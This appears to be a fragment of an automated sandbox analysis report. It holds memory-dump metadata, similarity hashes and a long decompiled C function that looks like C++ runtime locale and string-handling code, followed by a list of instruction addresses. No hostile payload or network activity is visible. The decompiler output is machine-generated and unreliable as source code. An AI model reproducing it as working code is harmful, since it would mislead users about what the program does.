                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                • String ID:
                                                • API String ID: 1423051803-0
                                                • Opcode ID: 3e0038c98a14da8056a3b97d0988904badaf7a3dfa13c94c9aaabcc490018a36
                                                • Instruction ID: 00b95b938e8362679554cc4c48765a118f8dd8d20a945f1e24a562c4cffc67d9
                                                • Opcode Fuzzy Hash: 3e0038c98a14da8056a3b97d0988904badaf7a3dfa13c94c9aaabcc490018a36
                                                • Instruction Fuzzy Hash: 3A512372501626EFEB219FA0EC41EBF36A9EF84750F250128FC14A7990DF30DD15A6A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 66%
                                                			E00C142A0(void* __ebx, intOrPtr __edx, void* __edi, unsigned int _a4) {
                                                				signed int _v4;
                                                				char _v8;
                                                				char _v12;
                                                				intOrPtr* _v16;
                                                				char _v20;
                                                				intOrPtr _v24;
                                                				void* _v32;
                                                				void* _v40;
                                                				intOrPtr _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				char _v60;
                                                				void* _v108;
                                                				void* _v124;
                                                				void* _v132;
                                                				intOrPtr _v136;
                                                				signed int _v140;
                                                				signed int _v144;
                                                				signed int _v148;
                                                				signed int _v152;
                                                				signed int _v156;
                                                				signed int _v160;
                                                				signed int _v164;
                                                				signed int _v168;
                                                				signed int _v172;
                                                				signed int _v176;
                                                				signed int _v180;
                                                				void* _v188;
                                                				intOrPtr _v192;
                                                				void* __esi;
                                                				signed int _t132;
                                                				void* _t139;
                                                				signed int _t148;
                                                				signed int _t156;
                                                				intOrPtr _t160;
                                                				signed int _t165;
                                                				void* _t174;
                                                				signed int _t178;
                                                				signed int _t179;
                                                				signed int _t180;
                                                				signed int _t181;
                                                				signed int _t182;
                                                				signed int _t183;
                                                				void* _t194;
                                                				signed int _t199;
                                                				signed int _t200;
                                                				signed int _t201;
                                                				unsigned int _t203;
                                                				void* _t204;
                                                				signed int _t220;
                                                				signed int _t222;
                                                				void* _t225;
                                                				void* _t226;
                                                				signed int _t228;
                                                				intOrPtr _t229;
                                                				signed int _t233;
                                                				signed int _t236;
                                                				signed int _t237;
                                                				void* _t242;
                                                				signed int _t247;
                                                				signed int _t248;
                                                				intOrPtr _t250;
                                                				void* _t251;
                                                				unsigned int _t252;
                                                				signed int* _t253;
                                                				signed int _t254;
                                                				signed int _t255;
                                                				void* _t256;
                                                				unsigned int _t261;
                                                				intOrPtr _t267;
                                                				intOrPtr _t272;
                                                				signed int _t283;
                                                				void* _t285;
                                                				void* _t288;
                                                				signed int _t293;
                                                				intOrPtr _t294;
                                                				signed int _t295;
                                                				signed int _t297;
                                                				void* _t298;
                                                				signed int _t299;
                                                				void* _t300;
                                                				signed int _t301;
                                                				intOrPtr* _t308;
                                                				void* _t309;
                                                				signed int _t310;
                                                				signed int _t311;
                                                				void* _t312;
                                                				signed int _t313;
                                                				signed int _t317;
                                                				signed int _t320;
                                                				signed int _t322;
                                                				signed int _t326;
                                                				signed int _t328;
                                                				signed int _t329;
                                                				void* _t336;
                                                				signed int _t337;
                                                				void* _t339;
                                                				void* _t340;
                                                				signed int _t341;
                                                				void* _t343;
                                                				void* _t346;
                                                				void* _t347;
                                                				void* _t348;
                                                				void* _t355;
                                                
                                                				_t292 = __edx;
                                                				_t337 = _t336 - 0x18;
                                                				_t132 =  *0xc42014; // 0x4fdfcf70
                                                				_v4 = _t132 ^ _t337;
                                                				_push(__ebx);
                                                				_push(__edi);
                                                				_v16 = _a4;
                                                				E00C153B9( &_v8, 0);
                                                				_t297 =  *0xc9984c; // 0x3
                                                				_t250 =  *0xc9983c; // 0x1672e08
                                                				_v24 = _t250;
                                                				if(_t297 == 0) {
                                                					E00C153B9( &_v12, _t297);
                                                					_t355 =  *0xc9984c - _t297; // 0x3
                                                					if(_t355 == 0) {
                                                						_t247 =  *0xc98b50; // 0x3
                                                						_t248 = _t247 + 1;
                                                						 *0xc98b50 = _t248;
                                                						 *0xc9984c = _t248;
                                                					}
                                                					E00C15411( &_v12);
                                                					_t297 =  *0xc9984c; // 0x3
                                                				}
                                                				_t261 = _a4;
                                                				_t326 = _t297 * 4;
                                                				if(_t297 >=  *((intOrPtr*)(_t261 + 0xc))) {
                                                					_t308 = 0;
                                                					__eflags = 0;
                                                					goto L8;
                                                				} else {
                                                					_t308 =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 8)) + _t326));
                                                					if(_t308 != 0) {
                                                						L16:
                                                						E00C15411( &_v8);
                                                						_pop(_t298);
                                                						_pop(_t309);
                                                						_pop(_t251);
                                                						return E00C17193(_t308, _t251, _v4 ^ _t337, _t292, _t298, _t309);
                                                					} else {
                                                						L8:
                                                						if( *((char*)(_t261 + 0x14)) == 0) {
                                                							L11:
                                                							if(_t308 != 0) {
                                                								goto L16;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						} else {
                                                							_t242 = E00C15706();
                                                							if(_t297 >=  *((intOrPtr*)(_t242 + 0xc))) {
                                                								L12:
                                                								if(_t250 == 0) {
                                                									_push(_v16);
                                                									_t139 = E00C14D50(_t250, _t292,  &_v20);
                                                									_t339 = _t337 + 8;
                                                									__eflags = _t139 - 0xffffffff;
                                                									if(__eflags == 0) {
                                                										E00C11810();
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										_push(_t261);
                                                										_push(_t250);
                                                										_push(_t308);
                                                										_t310 =  *(_t339 + 0x10);
                                                										_t252 = _t261;
                                                										 *((intOrPtr*)(_t339 + 8)) = _v20;
                                                										__eflags = _t310 - 0x7ffffffe;
                                                										if(__eflags > 0) {
                                                											L38:
                                                											E00C112D0(_t261, __eflags);
                                                											goto L39;
                                                										} else {
                                                											_push(_t326);
                                                											_t326 =  *(_t252 + 0x14);
                                                											_t322 = _t310 | 0x00000007;
                                                											_push(_t297);
                                                											__eflags = _t322 - 0x7ffffffe;
                                                											if(_t322 <= 0x7ffffffe) {
                                                												_t261 = _t326 >> 1;
                                                												__eflags = _t326 - 0x7ffffffe - _t261;
                                                												if(_t326 <= 0x7ffffffe - _t261) {
                                                													_t225 = _t261 + _t326;
                                                													__eflags = _t322 - _t225;
                                                													_t310 =  <  ? _t225 : _t322;
                                                													_t226 = _t310 + 1;
                                                													__eflags = _t226 - 0x7fffffff;
                                                													if(_t226 > 0x7fffffff) {
                                                														goto L37;
                                                													} else {
                                                														_t228 = _t226 + _t226;
                                                														__eflags = _t228 - 0x1000;
                                                														if(_t228 < 0x1000) {
                                                															__eflags = _t228;
                                                															if(__eflags == 0) {
                                                																_t297 = 0;
                                                																__eflags = 0;
                                                															} else {
                                                																_t236 = E00C171A1(_t310, __eflags, _t228);
                                                																_t339 = _t339 + 4;
                                                																_t297 = _t236;
                                                															}
                                                															goto L31;
                                                														} else {
                                                															goto L25;
                                                														}
                                                													}
                                                												} else {
                                                													_t310 = 0x7ffffffe;
                                                													_t228 = 0xfffffffe;
                                                													goto L25;
                                                												}
                                                											} else {
                                                												_t310 = 0x7ffffffe;
                                                												_t228 = 0xfffffffe;
                                                												L25:
                                                												_t29 = _t228 + 0x23; // 0x80000022
                                                												_t261 = _t29;
                                                												__eflags = _t261 - _t228;
                                                												if(__eflags <= 0) {
                                                													L37:
                                                													E00C11250();
                                                													goto L38;
                                                												} else {
                                                													_t237 = E00C171A1(_t310, __eflags, _t261);
                                                													_t339 = _t339 + 4;
                                                													__eflags = _t237;
                                                													if(_t237 == 0) {
                                                														L39:
                                                														L101();
                                                														asm("int3");
                                                														_t340 = _t339 - 0xc;
                                                														_t293 =  *(_t340 + 0x10);
                                                														_push(_t252);
                                                														_t253 = _t261;
                                                														_v44 =  *((intOrPtr*)(_t340 + 0x18));
                                                														_push(_t326);
                                                														_t328 = _t253[4];
                                                														__eflags = 0x7fffffff - _t328 - _t293;
                                                														if(__eflags < 0) {
                                                															E00C112D0(0x7fffffff, __eflags);
                                                															goto L60;
                                                														} else {
                                                															_push(_t310);
                                                															_t201 = _t293 + _t328;
                                                															_v52 = _t201;
                                                															_t317 = _t201 | 0x0000000f;
                                                															_push(_t297);
                                                															_t297 = _t253[5];
                                                															_v48 = _t297;
                                                															__eflags = _t317 - 0x7fffffff;
                                                															if(__eflags <= 0) {
                                                																_t203 = _t297 >> 1;
                                                																__eflags = _t297 - 0x7fffffff - _t203;
                                                																if(__eflags <= 0) {
                                                																	_t204 = _t203 + _t297;
                                                																	__eflags = _t317 - _t204;
                                                																	_t310 =  <  ? _t204 : _t317;
                                                																	__eflags = _t310;
                                                																} else {
                                                																	_t310 = 0x7fffffff;
                                                																}
                                                															} else {
                                                																_t310 = 0x7fffffff;
                                                															}
                                                															_t283 =  ~(0 | __eflags > 0x00000000) | _t310 + 0x00000001;
                                                															__eflags = _t283 - 0x1000;
                                                															if(_t283 < 0x1000) {
                                                																__eflags = _t283;
                                                																if(__eflags == 0) {
                                                																	_t297 = 0;
                                                																	__eflags = 0;
                                                																} else {
                                                																	_t220 = E00C171A1(_t310, __eflags, _t283);
                                                																	_t340 = _t340 + 4;
                                                																	_t297 = _t220;
                                                																}
                                                																goto L53;
                                                															} else {
                                                																_t51 = _t283 + 0x23; // 0x23
                                                																_t221 = _t51;
                                                																__eflags = _t51 - _t283;
                                                																if(__eflags <= 0) {
                                                																	L60:
                                                																	E00C11250();
                                                																	goto L61;
                                                																} else {
                                                																	_t222 = E00C171A1(_t310, __eflags, _t221);
                                                																	_t340 = _t340 + 4;
                                                																	__eflags = _t222;
                                                																	if(_t222 == 0) {
                                                																		L61:
                                                																		L101();
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		asm("int3");
                                                																		_t341 = _t340 - 0x88;
                                                																		_t148 =  *0xc42014; // 0x4fdfcf70
                                                																		_v56 = _t148 ^ _t341;
                                                																		_push(_t253);
                                                																		_t254 = _v48;
                                                																		_push(_t328);
                                                																		_push(_t310);
                                                																		_push(_t297);
                                                																		_v136 = _t254;
                                                																		E00C153B9(_t341 + 0x80, 0);
                                                																		_t299 =  *0xc98b64; // 0x1
                                                																		_t329 =  *0xc99840; // 0x166e9d0
                                                																		__eflags = _t299;
                                                																		if(_t299 == 0) {
                                                																			E00C153B9( &_v60, _t299);
                                                																			__eflags =  *0xc98b64 - _t299; // 0x1
                                                																			if(__eflags == 0) {
                                                																				_t199 =  *0xc98b50; // 0x3
                                                																				_t200 = _t199 + 1;
                                                																				__eflags = _t200;
                                                																				 *0xc98b50 = _t200;
                                                																				 *0xc98b64 = _t200;
                                                																			}
                                                																			E00C15411( &_v60);
                                                																			_t299 =  *0xc98b64; // 0x1
                                                																		}
                                                																		_t267 =  *((intOrPtr*)(_t254 + 4));
                                                																		_t255 = _t299 * 4;
                                                																		__eflags = _t299 -  *((intOrPtr*)(_t267 + 0xc));
                                                																		if(_t299 >=  *((intOrPtr*)(_t267 + 0xc))) {
                                                																			_t311 = 0;
                                                																			__eflags = 0;
                                                																			goto L70;
                                                																		} else {
                                                																			_t311 =  *(_t255 +  *((intOrPtr*)(_t267 + 8)));
                                                																			__eflags = _t311;
                                                																			if(_t311 == 0) {
                                                																				L70:
                                                																				__eflags =  *((char*)(_t267 + 0x14));
                                                																				if( *((char*)(_t267 + 0x14)) == 0) {
                                                																					L73:
                                                																					__eflags = _t311;
                                                																					if(_t311 != 0) {
                                                																						goto L68;
                                                																					} else {
                                                																						goto L74;
                                                																					}
                                                																				} else {
                                                																					_t194 = E00C15706();
                                                																					__eflags = _t299 -  *((intOrPtr*)(_t194 + 0xc));
                                                																					if(_t299 >=  *((intOrPtr*)(_t194 + 0xc))) {
                                                																						L74:
                                                																						__eflags = _t329;
                                                																						if(__eflags == 0) {
                                                																							_t311 = E00C171A1(_t311, __eflags, 0x44);
                                                																							_t343 = _t341 + 4;
                                                																							_t156 =  *(_v136 + 4);
                                                																							__eflags = _t156;
                                                																							if(_t156 == 0) {
                                                																								_t301 = 0xc3f5cf;
                                                																							} else {
                                                																								_t301 =  *(_t156 + 0x18);
                                                																								__eflags = _t301;
                                                																								if(_t301 == 0) {
                                                																									_t301 = _t156 + 0x1c;
                                                																								}
                                                																							}
                                                																							_t271 = _t343 + 0x14;
                                                																							E00C153B9(_t343 + 0x14, 0);
                                                																							 *(_t343 + 0x14) = 0;
                                                																							_v180 = 0;
                                                																							_v176 = 0;
                                                																							_v172 = 0;
                                                																							_v168 = 0;
                                                																							_v164 = 0;
                                                																							_v160 = 0;
                                                																							_v156 = 0;
                                                																							_v152 = 0;
                                                																							_v148 = 0;
                                                																							_v144 = 0;
                                                																							_v140 = 0;
                                                																							__eflags = _t301;
                                                																							if(_t301 == 0) {
                                                																								E00C15580("bad locale name");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								_t272 = _v192;
                                                																								_t160 =  *((intOrPtr*)(_t343 + 4));
                                                																								__eflags = _t272 - 0x1000;
                                                																								if(_t272 < 0x1000) {
                                                																									L98:
                                                																									_v192 = _t272;
                                                																									 *((intOrPtr*)(_t343 + 4)) = _t160;
                                                																									_push(_t329);
                                                																									return L00C179FA( *((intOrPtr*)(_t343 + 8)));
                                                																								} else {
                                                																									_t294 =  *((intOrPtr*)(_t160 - 4));
                                                																									_t272 = _t272 + 0x23;
                                                																									__eflags = _t160 - _t294 + 0xfffffffc - 0x1f;
                                                																									if(__eflags > 0) {
                                                																										_push(_t311);
                                                																										_t313 = _t311 ^ _t311;
                                                																										E00C1D8EA(_t272, _t313, __eflags, _t313, _t313, _t313, _t313, _t313);
                                                																										_push(_t313);
                                                																										_push(_t313);
                                                																										_push(_t313);
                                                																										_push(_t313);
                                                																										_push(_t313);
                                                																										L102();
                                                																										asm("int3");
                                                																										_t165 = IsProcessorFeaturePresent(0x17);
                                                																										__eflags = _t165;
                                                																										if(_t165 != 0) {
                                                																											_push(5);
                                                																											asm("int 0x29");
                                                																										}
                                                																										_push(_t313);
                                                																										E00C1D7A2(_t255, _t294, 0xc0000417, 2, 0xc0000417, 1);
                                                																										return TerminateProcess(GetCurrentProcess(), 0xc0000417);
                                                																									} else {
                                                																										_t160 = _t294;
                                                																										goto L98;
                                                																									}
                                                																								}
                                                																							} else {
                                                																								E00C1580C(_t271, _t343 + 0x10, _t301); // executed
                                                																								 *(_t311 + 4) = 0;
                                                																								 *_t311 = 0xc342ac;
                                                																								E00C16D84(_t301, _t311, __eflags, _t343 + 0x50);
                                                																								_t346 = _t343 + 0xc;
                                                																								asm("movups xmm0, [eax]");
                                                																								asm("movups [esi+0x8], xmm0");
                                                																								_t174 = E00C16DEF(__eflags, _t346 + 0x58);
                                                																								_t347 = _t346 + 4;
                                                																								asm("movups xmm0, [eax]");
                                                																								asm("movups [esi+0x18], xmm0");
                                                																								asm("movups xmm0, [eax+0x10]");
                                                																								asm("movups [esi+0x28], xmm0");
                                                																								asm("movq xmm0, [eax+0x20]");
                                                																								asm("movq [esi+0x38], xmm0");
                                                																								 *((intOrPtr*)(_t311 + 0x40)) =  *((intOrPtr*)(_t174 + 0x28));
                                                																								E00C15857(_t271, _t347 + 0x10);
                                                																								_t178 = _v140;
                                                																								_t348 = _t347 + 4;
                                                																								__eflags = _t178;
                                                																								if(_t178 != 0) {
                                                																									E00C1CD40(_t178);
                                                																									_t348 = _t348 + 4;
                                                																								}
                                                																								_t179 = _v148;
                                                																								_v140 = 0;
                                                																								__eflags = _t179;
                                                																								if(_t179 != 0) {
                                                																									E00C1CD40(_t179);
                                                																									_t348 = _t348 + 4;
                                                																								}
                                                																								_t180 = _v156;
                                                																								_v148 = 0;
                                                																								__eflags = _t180;
                                                																								if(_t180 != 0) {
                                                																									E00C1CD40(_t180);
                                                																									_t348 = _t348 + 4;
                                                																								}
                                                																								_t181 = _v164;
                                                																								_v156 = 0;
                                                																								__eflags = _t181;
                                                																								if(_t181 != 0) {
                                                																									E00C1CD40(_t181);
                                                																									_t348 = _t348 + 4;
                                                																								}
                                                																								_t182 = _v172;
                                                																								_v164 = 0;
                                                																								__eflags = _t182;
                                                																								if(_t182 != 0) {
                                                																									E00C1CD40(_t182);
                                                																									_t348 = _t348 + 4;
                                                																								}
                                                																								_t183 = _v180;
                                                																								_v172 = 0;
                                                																								__eflags = _t183;
                                                																								if(_t183 != 0) {
                                                																									E00C1CD40(_t183);
                                                																									_t348 = _t348 + 4;
                                                																								}
                                                																								_v180 = 0;
                                                																								E00C15411(_t348 + 0x10);
                                                																								E00C156DA(__eflags, _t311);
                                                																								_t341 = _t348 + 4;
                                                																								 *((intOrPtr*)( *_t311 + 4))();
                                                																								 *0xc99840 = _t311;
                                                																								goto L68;
                                                																							}
                                                																						} else {
                                                																							_t311 = _t329;
                                                																							goto L68;
                                                																						}
                                                																					} else {
                                                																						_t311 =  *(_t255 +  *((intOrPtr*)(_t194 + 8)));
                                                																						goto L73;
                                                																					}
                                                																				}
                                                																			} else {
                                                																				L68:
                                                																				E00C15411(_t341 + 0x8c);
                                                																				_pop(_t300);
                                                																				_pop(_t312);
                                                																				_pop(_t256);
                                                																				__eflags = _v56 ^ _t341;
                                                																				return E00C17193(_t311, _t256, _v56 ^ _t341, _t293, _t300, _t312);
                                                																			}
                                                																		}
                                                																	} else {
                                                																		_t52 = _t222 + 0x23; // 0x23
                                                																		_t297 = _t52 & 0xffffffe0;
                                                																		 *(_t297 - 4) = _t222;
                                                																		L53:
                                                																		_t253[4] = _v52;
                                                																		_t253[5] = _t310;
                                                																		_t318 = _t297 + _t328;
                                                																		__eflags = _v48 - 0x10;
                                                																		_v52 = _v24 + _t297 + _t328;
                                                																		_push(_t328);
                                                																		if(_v48 < 0x10) {
                                                																			_push(_t253);
                                                																			_push(_t297);
                                                																			E00C18460();
                                                																			E00C18460(_t318, _v44, _v24);
                                                																			 *_v52 = 0;
                                                																			 *_t253 = _t297;
                                                																			return _t253;
                                                																		} else {
                                                																			_t320 =  *_t253;
                                                																			_push(_t320);
                                                																			_push(_t297);
                                                																			E00C18460();
                                                																			E00C18460(_t297 + _t328, _v44, _v24);
                                                																			_t340 = _t340 + 0x18;
                                                																			_t285 = _v48 + 1;
                                                																			 *_v52 = 0;
                                                																			__eflags = _t285 - 0x1000;
                                                																			if(_t285 < 0x1000) {
                                                																				L57:
                                                																				_push(_t285);
                                                																				_push(_t320);
                                                																				L100();
                                                																				 *_t253 = _t297;
                                                																				return _t253;
                                                																			} else {
                                                																				_t293 =  *(_t320 - 4);
                                                																				_t285 = _t285 + 0x23;
                                                																				_t310 = _t320 - _t293;
                                                																				_t67 = _t310 - 4; // 0x7ffffffb
                                                																				__eflags = _t67 - 0x1f;
                                                																				if(_t67 > 0x1f) {
                                                																					goto L61;
                                                																				} else {
                                                																					_t320 = _t293;
                                                																					goto L57;
                                                																				}
                                                																			}
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													} else {
                                                														_t30 = _t237 + 0x23; // 0x23
                                                														_t297 = _t30 & 0xffffffe0;
                                                														 *(_t297 - 4) = _t237;
                                                														L31:
                                                														_t229 =  *((intOrPtr*)(_t339 + 0x18));
                                                														 *(_t252 + 0x14) = _t310;
                                                														 *((intOrPtr*)(_t252 + 0x10)) = _t229;
                                                														_t310 = _t229 + _t229;
                                                														E00C18460(_t297,  *((intOrPtr*)(_t339 + 0x14)), _t310);
                                                														_t339 = _t339 + 0xc;
                                                														 *((short*)(_t310 + _t297)) = 0;
                                                														__eflags = _t326 - 8;
                                                														if(_t326 < 8) {
                                                															L36:
                                                															 *_t252 = _t297;
                                                															return _t252;
                                                														} else {
                                                															_t233 =  *_t252;
                                                															_t288 = 2 + _t326 * 2;
                                                															__eflags = _t288 - 0x1000;
                                                															if(_t288 < 0x1000) {
                                                																L35:
                                                																_push(_t288);
                                                																_push(_t233);
                                                																L100();
                                                																goto L36;
                                                															} else {
                                                																_t295 =  *(_t233 - 4);
                                                																_t261 = _t288 + 0x23;
                                                																__eflags = _t233 - _t295 + 0xfffffffc - 0x1f;
                                                																if(_t233 - _t295 + 0xfffffffc > 0x1f) {
                                                																	goto L39;
                                                																} else {
                                                																	_t233 = _t295;
                                                																	goto L35;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										_t308 = _v16;
                                                										E00C156DA(__eflags, _t308);
                                                										_t292 =  *_t308;
                                                										_t337 = _t339 + 4;
                                                										 *((intOrPtr*)( *_t308 + 4))();
                                                										 *0xc9983c = _t308;
                                                										goto L16;
                                                									}
                                                								} else {
                                                									_t308 = _t250;
                                                									goto L16;
                                                								}
                                                							} else {
                                                								_t308 =  *((intOrPtr*)( *((intOrPtr*)(_t242 + 8)) + _t326));
                                                								goto L11;
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}












































































































                                                0x00c142a0
                                                0x00c142a0
                                                0x00c142a3
                                                0x00c142aa
                                                0x00c142ae
                                                0x00c142b9
                                                0x00c142bc
                                                0x00c142c0
                                                0x00c142c5
                                                0x00c142cb
                                                0x00c142d1
                                                0x00c142d7
                                                0x00c142de
                                                0x00c142e3
                                                0x00c142e9
                                                0x00c142eb
                                                0x00c142f0
                                                0x00c142f1
                                                0x00c142f6
                                                0x00c142f6
                                                0x00c142ff
                                                0x00c14304
                                                0x00c14304
                                                0x00c1430a
                                                0x00c1430d
                                                0x00c14317
                                                0x00c14325
                                                0x00c14325
                                                0x00000000
                                                0x00c14319
                                                0x00c1431c
                                                0x00c14321
                                                0x00c14379
                                                0x00c1437d
                                                0x00c14388
                                                0x00c14389
                                                0x00c1438b
                                                0x00c14396
                                                0x00c14323
                                                0x00c14327
                                                0x00c1432b
                                                0x00c1433d
                                                0x00c1433f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1432d
                                                0x00c1432d
                                                0x00c14335
                                                0x00c14341
                                                0x00c14343
                                                0x00c14349
                                                0x00c14352
                                                0x00c14357
                                                0x00c1435a
                                                0x00c1435d
                                                0x00c14397
                                                0x00c1439c
                                                0x00c1439d
                                                0x00c1439e
                                                0x00c1439f
                                                0x00c143a0
                                                0x00c143a5
                                                0x00c143a6
                                                0x00c143a7
                                                0x00c143ab
                                                0x00c143ad
                                                0x00c143b1
                                                0x00c143b7
                                                0x00c144b5
                                                0x00c144b5
                                                0x00000000
                                                0x00c143bd
                                                0x00c143bd
                                                0x00c143be
                                                0x00c143c1
                                                0x00c143c4
                                                0x00c143c5
                                                0x00c143cb
                                                0x00c143e2
                                                0x00c143e6
                                                0x00c143e8
                                                0x00c143f8
                                                0x00c143fb
                                                0x00c143fd
                                                0x00c14400
                                                0x00c14403
                                                0x00c14408
                                                0x00000000
                                                0x00c1440e
                                                0x00c1440e
                                                0x00c14410
                                                0x00c14415
                                                0x00c1443e
                                                0x00c14440
                                                0x00c1444f
                                                0x00c1444f
                                                0x00c14442
                                                0x00c14443
                                                0x00c14448
                                                0x00c1444b
                                                0x00c1444b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c14415
                                                0x00c143ea
                                                0x00c143ef
                                                0x00c143f4
                                                0x00000000
                                                0x00c143f4
                                                0x00c143cd
                                                0x00c143d2
                                                0x00c143d7
                                                0x00c14417
                                                0x00c14417
                                                0x00c14417
                                                0x00c1441a
                                                0x00c1441c
                                                0x00c144b0
                                                0x00c144b0
                                                0x00000000
                                                0x00c14422
                                                0x00c14423
                                                0x00c14428
                                                0x00c1442b
                                                0x00c1442d
                                                0x00c144ba
                                                0x00c144ba
                                                0x00c144bf
                                                0x00c144c0
                                                0x00c144c7
                                                0x00c144cb
                                                0x00c144cc
                                                0x00c144ce
                                                0x00c144d7
                                                0x00c144da
                                                0x00c144df
                                                0x00c144e1
                                                0x00c14613
                                                0x00000000
                                                0x00c144e7
                                                0x00c144e7
                                                0x00c144e8
                                                0x00c144ed
                                                0x00c144f1
                                                0x00c144f4
                                                0x00c144f5
                                                0x00c144f8
                                                0x00c144fc
                                                0x00c144fe
                                                0x00c14506
                                                0x00c1450a
                                                0x00c1450c
                                                0x00c14515
                                                0x00c14517
                                                0x00c14519
                                                0x00c14519
                                                0x00c1450e
                                                0x00c1450e
                                                0x00c1450e
                                                0x00c14500
                                                0x00c14500
                                                0x00c14500
                                                0x00c14528
                                                0x00c1452a
                                                0x00c14530
                                                0x00c14559
                                                0x00c1455b
                                                0x00c1456a
                                                0x00c1456a
                                                0x00c1455d
                                                0x00c1455e
                                                0x00c14563
                                                0x00c14566
                                                0x00c14566
                                                0x00000000
                                                0x00c14532
                                                0x00c14532
                                                0x00c14532
                                                0x00c14535
                                                0x00c14537
                                                0x00c14618
                                                0x00c14618
                                                0x00000000
                                                0x00c1453d
                                                0x00c1453e
                                                0x00c14543
                                                0x00c14546
                                                0x00c14548
                                                0x00c1461d
                                                0x00c1461d
                                                0x00c14622
                                                0x00c14623
                                                0x00c14624
                                                0x00c14625
                                                0x00c14626
                                                0x00c14627
                                                0x00c14628
                                                0x00c14629
                                                0x00c1462a
                                                0x00c1462b
                                                0x00c1462c
                                                0x00c1462d
                                                0x00c1462e
                                                0x00c1462f
                                                0x00c14630
                                                0x00c14636
                                                0x00c1463d
                                                0x00c14644
                                                0x00c14645
                                                0x00c14653
                                                0x00c14654
                                                0x00c14655
                                                0x00c14658
                                                0x00c1465c
                                                0x00c14661
                                                0x00c14667
                                                0x00c1466d
                                                0x00c1466f
                                                0x00c14679
                                                0x00c1467e
                                                0x00c14684
                                                0x00c14686
                                                0x00c1468b
                                                0x00c1468b
                                                0x00c1468c
                                                0x00c14691
                                                0x00c14691
                                                0x00c1469d
                                                0x00c146a2
                                                0x00c146a2
                                                0x00c146a8
                                                0x00c146ab
                                                0x00c146b2
                                                0x00c146b5
                                                0x00c146e8
                                                0x00c146e8
                                                0x00000000
                                                0x00c146b7
                                                0x00c146ba
                                                0x00c146bd
                                                0x00c146bf
                                                0x00c146ea
                                                0x00c146ea
                                                0x00c146ee
                                                0x00c14700
                                                0x00c14700
                                                0x00c14702
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c146f0
                                                0x00c146f0
                                                0x00c146f5
                                                0x00c146f8
                                                0x00c14704
                                                0x00c14704
                                                0x00c14706
                                                0x00c14713
                                                0x00c14715
                                                0x00c1471c
                                                0x00c1471f
                                                0x00c14721
                                                0x00c1472f
                                                0x00c14723
                                                0x00c14723
                                                0x00c14726
                                                0x00c14728
                                                0x00c1472a
                                                0x00c1472a
                                                0x00c14728
                                                0x00c14736
                                                0x00c1473a
                                                0x00c14741
                                                0x00c14749
                                                0x00c1474e
                                                0x00c14756
                                                0x00c1475b
                                                0x00c14763
                                                0x00c14768
                                                0x00c1476c
                                                0x00c14771
                                                0x00c14775
                                                0x00c14779
                                                0x00c1477d
                                                0x00c14781
                                                0x00c14783
                                                0x00c148ad
                                                0x00c148b2
                                                0x00c148b3
                                                0x00c148b4
                                                0x00c148b5
                                                0x00c148b6
                                                0x00c148b7
                                                0x00c148b8
                                                0x00c148b9
                                                0x00c148ba
                                                0x00c148bb
                                                0x00c148bc
                                                0x00c148bd
                                                0x00c148be
                                                0x00c148bf
                                                0x00c148c0
                                                0x00c148c4
                                                0x00c148c8
                                                0x00c148ce
                                                0x00c148e2
                                                0x00c148e2
                                                0x00c148e6
                                                0x00c171d1
                                                0x00c171de
                                                0x00c148d0
                                                0x00c148d0
                                                0x00c148d3
                                                0x00c148db
                                                0x00c148de
                                                0x00c1d960
                                                0x00c1d961
                                                0x00c1d968
                                                0x00c1d970
                                                0x00c1d971
                                                0x00c1d972
                                                0x00c1d973
                                                0x00c1d974
                                                0x00c1d975
                                                0x00c1d97a
                                                0x00c1d97d
                                                0x00c1d983
                                                0x00c1d985
                                                0x00c1d987
                                                0x00c1d98a
                                                0x00c1d98a
                                                0x00c1d98c
                                                0x00c1d997
                                                0x00c1d9ae
                                                0x00c148e0
                                                0x00c148e0
                                                0x00000000
                                                0x00c148e0
                                                0x00c148de
                                                0x00c14789
                                                0x00c1478f
                                                0x00c14798
                                                0x00c147a0
                                                0x00c147a6
                                                0x00c147ab
                                                0x00c147ae
                                                0x00c147b6
                                                0x00c147ba
                                                0x00c147bf
                                                0x00c147c2
                                                0x00c147c5
                                                0x00c147c9
                                                0x00c147cd
                                                0x00c147d1
                                                0x00c147d6
                                                0x00c147de
                                                0x00c147e6
                                                0x00c147eb
                                                0x00c147ef
                                                0x00c147f2
                                                0x00c147f4
                                                0x00c147f7
                                                0x00c147fc
                                                0x00c147fc
                                                0x00c147ff
                                                0x00c14803
                                                0x00c1480b
                                                0x00c1480d
                                                0x00c14810
                                                0x00c14815
                                                0x00c14815
                                                0x00c14818
                                                0x00c1481c
                                                0x00c14824
                                                0x00c14826
                                                0x00c14829
                                                0x00c1482e
                                                0x00c1482e
                                                0x00c14831
                                                0x00c14835
                                                0x00c1483d
                                                0x00c1483f
                                                0x00c14842
                                                0x00c14847
